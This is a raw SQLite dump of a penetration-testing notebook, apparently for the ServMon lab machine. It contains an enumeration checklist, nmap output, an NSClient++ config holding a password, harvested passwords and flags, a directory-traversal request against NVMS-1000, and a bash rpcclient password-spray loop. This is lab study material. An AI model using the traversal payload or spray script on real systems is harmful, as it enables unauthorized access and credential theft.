SQLite format 3@ $-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node k '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Aq Mhk!' 10.10.10.Xcustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX"#'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184 Starting Nmap 7.80 ( custom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad [[v)'  Script Resultscustom-colorsXAIZ|xAqKF//Q'  Post Exploitationnadine@SERVMON C:\Program Files%'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Service Exploited: NVMS - 1000 Vulnerability Type: Directory Traversal Exploit POC: https://www.exploit-db.com/exploi$ X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg P^Pg'  Goodiescustom-colorsVA?& c"+g'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAp)c'  Scheduled JobsScheduled Taskscustom-colors$ANl ++o|''  PasswordsPasswords.txt 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ Users.txt adminsitrator Nathan Nadine Nadine:L1k3B1gBut7s@W0rk Found ew2x6SsGTxjRwXOT in NSClient.inicustom-colors$Aw /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x/'  I/1'  Proof\Flags\OtherUser - Nadine - 88a3b91d3946f557a05db54554d6ae6e Root - ace1e4ada884ea07256545f50fd7af22custom-colors$A)Z\f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAꏍPh  ' Log Bookcustom-colors(AI^\NSClient++>type nsclient.ini ´╗┐# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ; in flight - TODO [/settings/NRPE/server] ; Undocumented key ssl options = no-sslv2,no-sslv3 ; Undocumented key verify mode = peer-cert ; Undocumented key insecure = false ; in flight - TODO [/modules] ; Undocumented key CheckHelpers = disabled ; Undocumented key CheckEventLog = disabled ; Undocumented key CheckNSCP = disabled ; Undocumented key CheckDisk = disabled ; Undocumented key CheckSystem = disabled ; Undocumented key WEBServer = enabled ; Undocumented key NRPEServer = enabled ; CheckTaskSched - Check status of your scheduled jobs. CheckTaskSched = enabled ; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monit oring through NSCA Scheduler = enabled ; CheckExternalScripts - Module used to execute external scripts CheckExternalScripts = enabled ; Script wrappings - A list of templates for defining script commands. Enter any command line here and th ey will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments. [/settings/external scripts/wrappings] ; Batch file - Command used for executing wrapped batch files bat = scripts\\%SCRIPT% %ARGS% ; Visual basic script - Command line used for wrapped vbs scripts vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS% ; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" no t found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command - t found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command - t found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command - ; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments` [/settings/external scripts/scripts] ; Schedules - Section for the Scheduler module. [/settings/scheduler/schedules] ; Undocumented key foobar = command = foobar ; External script settings - General settings for the external scripts module (CheckExternalScripts). [/settings/external scripts] allow arguments = true custom-colors*A://nmap.org">https://nmap.org ) at 2020-07-16 10:02 EDT Nmap scan report for 10.10.10.184 Host is up (0.025s latency). Not shown: 65517 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh  OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340  | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open tcpwrapped 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Wind ows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=7/16%Time=5F105E2D%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x2!0\"-//W3C//DTD\x20X SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\. SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\ SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\ SF:x201\.0\x20Transitional//E"N\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1 SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\ SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1- SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2 SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=7/16%Time=5F105E35%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\ SF:x18\xa3\x13\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length: SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1 SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng SF:th:\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m22s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-16T14:08:26 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 224.99 seconds custom-colors*Axbts/47774 Description: Discovery of Vulnerability Exploit Code Used GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Gets us list of passwords (Check Passwords Node) Password Spray RPCCLIENT to determine Nadine's Credential for SSH #!/bin/bash for u in $(cat users.txt); do echo -n "[*] user: $u" && for p in $(cat passwords.txt); do echo "$u % $p" rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184 done done Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AmLj